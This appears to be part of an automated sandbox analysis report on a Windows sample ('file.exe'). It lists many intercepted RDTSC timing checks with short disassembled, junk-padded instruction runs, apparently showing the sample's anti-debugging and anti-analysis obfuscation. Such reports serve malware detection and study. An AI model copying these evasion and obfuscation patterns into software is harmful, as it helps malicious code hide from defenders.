              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7DEE second address: 6A7DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF8A95A6CB8h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8678 second address: 6A867C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A867C second address: 6A8688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C20 second address: 6A8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C26 second address: 6A8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8C2B second address: 6A8C35 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8CE3 second address: 6A8CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF8A95A6CB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AA2B1 second address: 6AA2C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8A909BC1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF8A909BC16h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671237 second address: 671243 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671243 second address: 671247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671247 second address: 67124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2C6 second address: 6AB2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2CA second address: 6AB2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2D0 second address: 6AB2D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2D5 second address: 6AB319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, 5A481C74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D346Eh] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FF8A95A6CB8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007FF8A95A6CB8h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB319 second address: 6AB31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB31F second address: 6AB323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB323 second address: 6AB342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB342 second address: 6AB347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB347 second address: 6AB34E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACE59 second address: 6ACE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF8A95A6CC8h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACE7A second address: 6ACECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FF8A909BC18h 0x0000000f popad 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D281Ah], edx 0x00000017 push 00000000h 0x00000019 adc edi, 32F08F40h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF8A909BC18h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b push eax 0x0000003c push esi 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD8F0 second address: 6AD8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD8F4 second address: 6AD974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FF8A909BC18h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jng 00007FF8A909BC1Ch 0x00000029 xor edi, dword ptr [ebp+122D2875h] 0x0000002f push 00000000h 0x00000031 jl 00007FF8A909BC16h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FF8A909BC18h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, 25095C00h 0x00000058 push eax 0x00000059 jl 00007FF8A909BC2Fh 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FF8A909BC1Dh 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AECE2 second address: 6AED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF8A95A6CB8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 mov esi, dword ptr [ebp+122D3816h] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D34E0h], edx 0x00000032 mov cx, si 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF8A95A6CBBh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AED2D second address: 6AED31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF622 second address: 6AF629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65992B second address: 659966 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF8A909BC28h 0x00000008 jmp 00007FF8A909BC1Ch 0x0000000d ja 00007FF8A909BC16h 0x00000013 jmp 00007FF8A909BC1Ah 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 jbe 00007FF8A909BC16h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFF10 second address: 6AFF1A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659966 second address: 65996B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F6F7 second address: 66F6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F6FB second address: 66F71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC1Bh 0x0000000b push edi 0x0000000c jo 00007FF8A909BC16h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F71A second address: 66F71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B370B second address: 6B370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B370F second address: 6B3713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CB8 second address: 6B4CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 or ebx, dword ptr [ebp+122D38C2h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF8A909BC18h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx ebx, di 0x0000002c push 00000000h 0x0000002e mov edi, ecx 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CF0 second address: 6B4CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CF4 second address: 6B4D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF8A909BC1Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 pushad 0x00000017 jmp 00007FF8A909BC29h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5BA1 second address: 6B5BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4F6A second address: 6B4F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8A909BC27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7A90 second address: 6B7AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF8A95A6CB6h 0x0000000a pop edi 0x0000000b jmp 00007FF8A95A6CBFh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D02 second address: 6B5D08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D08 second address: 6B5D12 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D12 second address: 6B5D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FF8A909BC20h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B80A2 second address: 6B810E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 ja 00007FF8A95A6CCDh 0x0000000f je 00007FF8A95A6CC7h 0x00000015 jmp 00007FF8A95A6CC1h 0x0000001a nop 0x0000001b sub dword ptr [ebp+122DB641h], ecx 0x00000021 mov di, 40E8h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FF8A95A6CB8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 and edi, dword ptr [ebp+122D3916h] 0x00000049 pushad 0x0000004a xor dword ptr [ebp+12457DF4h], edx 0x00000050 popad 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jnl 00007FF8A95A6CB8h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9050 second address: 6B9054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9054 second address: 6B905E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8217 second address: 6B821E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B905E second address: 6B9062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA014 second address: 6BA01E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA01E second address: 6BA02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA02A second address: 6BA03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Ch 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA03B second address: 6BA04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CBEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA04D second address: 6BA099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub bx, 4E00h 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jnp 00007FF8A909BC1Ch 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF8A909BC18h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or bx, C9F2h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA099 second address: 6BA09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA09D second address: 6BA0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA0A3 second address: 6BA0A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA0A8 second address: 6BA0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB07E second address: 6BB084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB084 second address: 6BB088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB088 second address: 6BB08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1D6 second address: 6BA1F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1F4 second address: 6BA1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1F8 second address: 6BA1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA2B7 second address: 6BA2BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA2BC second address: 6BA2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FF8A909BC20h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB2A1 second address: 6BB2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB2A5 second address: 6BB2AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC22A second address: 6BC22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC22E second address: 6BC234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC234 second address: 6BC2BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add dword ptr [ebp+12471DCCh], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF8A95A6CB8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jnp 00007FF8A95A6CB7h 0x00000041 mov eax, dword ptr [ebp+122D1655h] 0x00000047 movzx ebx, dx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007FF8A95A6CB8h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 jmp 00007FF8A95A6CBAh 0x0000006b nop 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 popad 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE06D second address: 6BE0EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8A909BC23h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007FF8A909BC1Eh 0x00000011 nop 0x00000012 jmp 00007FF8A909BC24h 0x00000017 mov di, 9B98h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF8A909BC18h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 stc 0x00000038 push 00000000h 0x0000003a xor dword ptr [ebp+122D34C3h], esi 0x00000040 mov edi, 43EC44A8h 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 jnc 00007FF8A909BC16h 0x0000004f jne 00007FF8A909BC16h 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE0EE second address: 6BE105 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FF8A95A6CB6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jc 00007FF8A95A6CB6h 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE248 second address: 6BE24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE325 second address: 6BE32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2D8D second address: 6C2E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov bx, 3A76h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007FF8A909BC27h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov eax, dword ptr [ebp+122D16F9h] 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FF8A909BC18h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov edi, 468AA1DEh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007FF8A909BC18h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 jmp 00007FF8A909BC29h 0x00000069 push eax 0x0000006a jc 00007FF8A909BC24h 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2E47 second address: 6C2E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DD5 second address: 6C3DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
